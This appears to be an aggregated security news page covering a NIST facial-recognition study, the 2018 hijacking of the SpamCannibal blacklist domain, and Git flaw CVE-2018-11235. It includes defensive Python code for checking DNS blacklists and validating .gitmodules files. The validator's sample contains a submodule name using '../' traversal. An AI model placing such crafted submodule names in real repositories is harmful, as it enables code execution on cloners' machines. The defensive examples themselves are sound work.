This NIST study is specifically about facial recognition -- but the basic principles are likely to be similar across all uses of machine learning in biometrics and cybersecurity. "First, the machine learning algorithm gathers facts about a situation through inputs and then compares this information to stored data and decides what the information signifies," explains Dr. Kevin Curran, senior IEEE member and professor of cybersecurity at Ulster University. "The computer runs through various possible actions and predicts which action will be most successful based on the collected information.

"AI is therefore increasingly playing a significant role in cybersecurity, especially as more challenges appear with authenticating users. However, these AI techniques must be adaptive and self-learning in complex and challenging scenarios where people have parts of their face obscured or the lighting is quite poor to preserve accuracy and a low false acceptance rate."

He cites the use of AI in Apple's Face ID. "Face ID works by projecting around 30,000 infrared dots on a face to produce a 3D mesh. This resultant facial recognition information is stored locally in a secure enclave on the new Apple A11 Bionic chip. The infra-red sensor on the front is crucial for sensing depth. Earlier facial recognition features, e.g. Samsung's last year, were too easily fooled by face masks and 2D photos. Apple claim their Face ID will not succumb to these methods. However, some claim already that 3D printing someone's head may fool it, but we have yet to see that hack tested."

This NIST study was solely about the efficacy of facial recognition algorithms, and the results cannot be automatically applied to other machine learning algorithms. Nevertheless, the general conclusions are likely to apply across many other uses for AI in both physical security and cybersecurity. AI is improving rapidly. It cannot yet replace human expertise completely, but it is most effective when used in conjunction with, or by, a single human expert. The implication is very clear: the correct combination of man and machine already has the potential to both improve performance and reduce payroll costs.

Miscreants hijacked the defunct SpamCannibal blacklist service
30.5.2018 securityaffairs

The SpamCannibal blacklist service was hijacked since Wednesday morning, attackers changed the DNS name server settings for the website overnight.
SpamCannibal was created to blacklist the IP addresses of malicious servers involved in spam campaigns and DoS attacks.

SpamCannibal used a continually updated database containing the IP addresses of spam or DoS servers and blocked their ability to connect by using services on a computer system that purposely delay incoming connections (aka a TCP/IP tarpit).

The blacklist service had been offline since last summer when it was hijacked on Wednesday morning.

The news was first reported by El Reg, which was informed of the strange resurrection by a reader who told them that SpamCannibal was “pumping out Blacklist notifications for some of our servers and then when you go to spamcannibal.org, you get spam.”

“Visiting the site earlier today flung fake Adobe Flash updates at our sandboxed browser, downloads no doubt riddled with malware, so beware.” reads a blog post published by El Reg.

The DNS record for the blacklist service was changed to point at a rogue server controlled by attackers that likely used it to deliver malware and to alter the results of queries to the blacklist service.

Kevin Beaumont 🐈

If anybody uses spamcannibal's RBL, the domain has been taken over and has a wildcard response - so it returns everything as status spam. https://twitter.com/webme_it/status/1001731230264627202 …

12:51 PM - May 30, 2018
Every user who queried the service to check whether an IP address was blacklisted as a spam source always received a positive result, with serious consequences.

The attackers set a wildcard DNS record so that any subdomain of spamcannibal.org returns an IP address; with this trick, every address queried against the domain was reported as blacklisted.
Researcher Martijn Grooten believes the attack wasn’t targeted.

“This really looks like a standard domain takeover by some dodgy parking service. Doesn’t appear particularly targeted to Spamcannibal,” Grooten concluded.
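A defender-side check for the failure mode described in this article, added here as an example (it is not code from SpamCannibal or from the article's author): it builds the DNSBL lookup name and, before trusting any answer, applies the RFC 5782 sanity test (127.0.0.2 must be listed, 127.0.0.1 must not), which a wildcard-hijacked zone fails. The zone name and the two resolver functions are constructed stand-ins for real DNS.

```python
import ipaddress
from typing import Callable, Optional

# A resolver takes a DNS name and returns its A record as a string, or None on NXDOMAIN.
Resolver = Callable[[str], Optional[str]]


def dnsbl_query_name(ip: str, zone: str) -> str:
    """Build the DNSBL lookup name: reversed IPv4 octets prepended to the zone.
    192.0.2.10 against rbl.example.invalid -> 10.2.0.192.rbl.example.invalid"""
    octets = ipaddress.IPv4Address(ip).exploded.split(".")
    return ".".join(reversed(octets)) + "." + zone


def is_listed(ip: str, zone: str, resolve: Resolver) -> bool:
    """A DNSBL reports an address as listed whenever the lookup name resolves at all."""
    return resolve(dnsbl_query_name(ip, zone)) is not None


def zone_is_sane(zone: str, resolve: Resolver) -> bool:
    """RFC 5782 section 5 sanity test: 127.0.0.2 must be listed and 127.0.0.1 must not.
    A wildcard zone (what a parked or hijacked domain looks like) answers both; a dead
    zone answers neither. In both cases the list must not be trusted."""
    return is_listed("127.0.0.2", zone, resolve) and not is_listed("127.0.0.1", zone, resolve)


def check_sender(ip: str, zone: str, resolve: Resolver) -> str:
    """Classify a sender address, failing open when the list itself is broken."""
    if not zone_is_sane(zone, resolve):
        return "unknown"  # do not reject mail on the say-so of a broken or hijacked list
    return "listed" if is_listed(ip, zone, resolve) else "clean"


# Constructed fake resolvers standing in for real DNS; the zone name is not a real list.
ZONE = "rbl.example.invalid"


def healthy_resolver(name: str) -> Optional[str]:
    """Answers only for the RFC 5782 test entry and one constructed listed address."""
    listed = {f"2.0.0.127.{ZONE}": "127.0.0.2", f"10.2.0.192.{ZONE}": "127.0.0.2"}
    return listed.get(name)


def wildcard_resolver(name: str) -> Optional[str]:
    """A parked or hijacked domain with a wildcard record: every subdomain resolves."""
    return "198.51.100.7" if name.endswith("." + ZONE) else None
```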

CVE-2018-11235 flaw in Git can lead to arbitrary code execution
30.5.2018 securityaffairs

The Git community disclosed a dangerous vulnerability in Git, tracked as CVE-2018-11235, that can lead to arbitrary code execution when a user operates in a malicious repository.
The Git developer team and other firms offering Git repository hosting services have issued security updates to address a remote code execution vulnerability, tracked as CVE-2018-11235, in the Git source code versioning software.

“In Git before 2.13.7, 2.14.x before 2.14.4, 2.15.x before 2.15.2, 2.16.x before 2.16.4, and 2.17.x before 2.17.1, remote code execution can occur.” reads the description provided by the Mitre organization.

“With a crafted .gitmodules file, a malicious project can execute an arbitrary script on a machine that runs “git clone --recurse-submodules” because submodule “names” are obtained from this file, and then appended to $GIT_DIR/modules, leading to directory traversal with “../” in a name. Finally, post-checkout hooks from a submodule are executed, bypassing the intended design in which hooks are not obtained from a remote server.”

The vulnerability was discovered by the researcher Etienne Stalmans as part of GitHub’s bug bounty program.

The Git 2.17.1 addressed the CVE-2018-11235 vulnerability along with the CVE-2018-11233 flaw.

CVE-2018-11235 could be exploited by an attacker who sets up a malformed Git repository containing a specially-built Git submodule. The attacker needs to trick victims into cloning the rogue repository to execute arbitrary code on their systems.

The problem resides in the way the Git client handles the specially-built Git submodule.

The release also includes support for a Git server-side component that Git hosting services can use to detect code repositories containing malicious submodules and prevent their upload.

“In addition to the above fixes, this release adds support on the server side that reject pushes to repositories that attempt to create such problematic .gitmodules file etc. as tracked contents, to help hosting sites protect their customers with older clients by preventing malicious contents from spreading.” reads the release note for v2.17.

“This is enabled by the same receive.fsckObjects configuration on the server side as other security and sanity related checks (e.g. rejecting tree entry “.GIT” in a wrong case as tracked contents, targeting victims on case insensitive systems) that have already been implemented in the past releases. It is recommended to double check your configuration if you are hosting contents for other people.”
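A simplified version of the server-side check described above, added here as an example (it is not Git's own fsck code and only mirrors the intent of the 2.17.1 submodule-name check as described on this page): it parses a pushed .gitmodules blob and flags submodule names that would not stay under $GIT_DIR/modules. The sample blob is constructed; the hook function name is hypothetical.

```python
import posixpath
import re

# [submodule "name"] headers; git-config subsection names may contain \" and \\ escapes.
SECTION_RE = re.compile(r'^\s*\[submodule\s+"((?:[^"\\]|\\.)*)"\]\s*(?:[#;].*)?$')
KEY_RE = re.compile(r'^\s*([A-Za-z][A-Za-z0-9-]*)\s*=\s*(.*?)\s*$')


def parse_gitmodules(text: str) -> dict:
    """Parse .gitmodules into {submodule_name: {key: value}} (subset of git-config syntax)."""
    modules, current = {}, None
    for line in text.splitlines():
        m = SECTION_RE.match(line)
        if m:
            current = re.sub(r"\\(.)", r"\1", m.group(1))  # unescape \" and \\
            modules.setdefault(current, {})
            continue
        m = KEY_RE.match(line)
        if m and current is not None:
            modules[current][m.group(1).lower()] = m.group(2)
    return modules


def name_escapes_modules_dir(name: str) -> bool:
    """True if $GIT_DIR/modules/<name> would not stay under $GIT_DIR/modules, or the name
    is otherwise unsafe: empty names, names starting with '-', absolute names and any
    '..' path component are rejected (an approximation of Git's check, not its code)."""
    if name == "" or name.startswith("-") or name.startswith("/"):
        return True
    # Treat both separators as directory separators, as Git does on Windows.
    if ".." in re.split(r"[/\\]", name):
        return True
    resolved = posixpath.normpath(posixpath.join("modules", name))
    return not resolved.startswith("modules/")


def offending_submodules(gitmodules_text: str) -> list:
    """Names a (hypothetical) pre-receive hook should reject for a pushed .gitmodules blob."""
    return sorted(n for n in parse_gitmodules(gitmodules_text) if name_escapes_modules_dir(n))


# Constructed sample blob: one normal submodule and one whose name traverses upward.
SAMPLE = '''[submodule "vendor/lib"]
\tpath = vendor/lib
\turl = https://example.invalid/lib.git
[submodule "../../outside"]
\tpath = tools
\turl = https://example.invalid/other.git
'''
```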

Major Git hosting services like GitHub and Microsoft have already installed the security patches.

Edward Thomson, Program Manager for Visual Studio Team Services, confirmed that Git 2.17.1 and Git for Windows 2.17.1 (2) already include the fix for the flaws and encouraged all users to update their Git clients as soon as possible.

Thomson published a technical analysis for the CVE-2018-11235 vulnerability.